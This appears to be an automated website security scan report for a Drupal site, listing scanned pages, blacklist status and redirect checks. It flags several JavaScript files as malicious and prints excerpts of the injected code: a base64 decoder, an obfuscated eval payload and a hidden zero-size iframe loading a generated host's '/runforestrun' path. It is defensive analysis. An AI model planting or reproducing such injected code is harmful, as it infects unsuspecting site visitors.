Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=first-persons.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://first-persons.ru/ | 200 OK Content-Length: 34815 Content-Type: text/html | clean |
http://first-persons.ru/misc/jquery.js | 200 OK Content-Length: 31008 Content-Type: application/javascript | clean |
http://first-persons.ru/misc/drupal.js | 200 OK Content-Length: 19624 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Decoded script: var Drupal = Drupal || {}; /** * Set the variable that indicates if JavaScript behaviors should be applied */ Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById; /** * Extends the current object with the parameter. Works recursively. */ Drupal.extend = function(obj) { for (var i in obj) { if (this[i]) { Antivirus reports:
| ||
http://first-persons.ru/sites/default/modules/jquery_update/compat.js | 200 OK Content-Length: 3537 Content-Type: application/javascript | clean |
http://first-persons.ru/sites/default/modules/lightbox2/js/lightbox.js | 200 OK Content-Length: 41769 Content-Type: application/javascript | clean |
http://first-persons.ru/themes/tapestry/js/jquery.pngFix.js | 200 OK Content-Length: 14521 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Antivirus reports:
| ||
http://first-persons.ru/themes/tapestry/js/pickstyle.js | 200 OK Content-Length: 9984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Decoded script: function pickstyle(whichstyle) { var expireDate = new Date() var expstring=expireDate.setDate(expireDate.getDate()+30) document.cookie = "tapestrystyle=" + whichstyle + "; expires="+expireDate.toGMTString() } /*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100 var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 */ Antivirus reports:
| ||
http://first-persons.ru/themes/tapestry/js/pickicons.js | 200 OK Content-Length: 9982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Decoded script: function pickicons(state) { var expireDate = new Date() var expstring=expireDate.setDate(expireDate.getDate()+30) document.cookie = "tapestryicons=" + state + "; expires="+expireDate.toGMTString() } /*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100,222,327,3 var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 */ Antivirus reports:
| ||
http://first-persons.ru/about | 200 OK Content-Length: 15945 Content-Type: text/html | clean |
http://first-persons.ru/order | 200 OK Content-Length: 15767 Content-Type: text/html | clean |
http://first-persons.ru/contact | 200 OK Content-Length: 14513 Content-Type: text/html | clean |
http://first-persons.ru/misc/textarea.js | 200 OK Content-Length: 1248 Content-Type: application/javascript | clean |
http://first-persons.ru/category/1/1 | 200 OK Content-Length: 29286 Content-Type: text/html | clean |
http://first-persons.ru/category/1/2 | 200 OK Content-Length: 19355 Content-Type: text/html | clean |
http://first-persons.ru/category/1/3 | 200 OK Content-Length: 18605 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: first-persons.ru
Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Connection: close
Date: Sat, 27 Dec 2014 13:34:05 GMT
ETag: "0c36a13c1aaf95cb205e63ef4b742b22"
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 16 May 2014 16:35:51 GMT
Set-Cookie: SESS657fde95c3fac9c2773bc4c84faa51cd=c7c4532e766c1ea302ed3767ace6727a; expires=Mon, 19-Jan-2015 17:07:25 GMT; path=/; domain=.first-persons.ru
GET / HTTP/1.1
Host: first-persons.ru
Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Connection: close
Date: Sat, 27 Dec 2014 13:34:05 GMT
ETag: "0c36a13c1aaf95cb205e63ef4b742b22"
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 16 May 2014 16:35:51 GMT
Set-Cookie: SESS657fde95c3fac9c2773bc4c84faa51cd=c7c4532e766c1ea302ed3767ace6727a; expires=Mon, 19-Jan-2015 17:07:25 GMT; path=/; domain=.first-persons.ru
Second query (visit from search engine):
GET / HTTP/1.1
Host: first-persons.ru
Referer: http://www.google.com/search?q=first-persons.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: first-persons.ru
Referer: http://www.google.com/search?q=first-persons.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.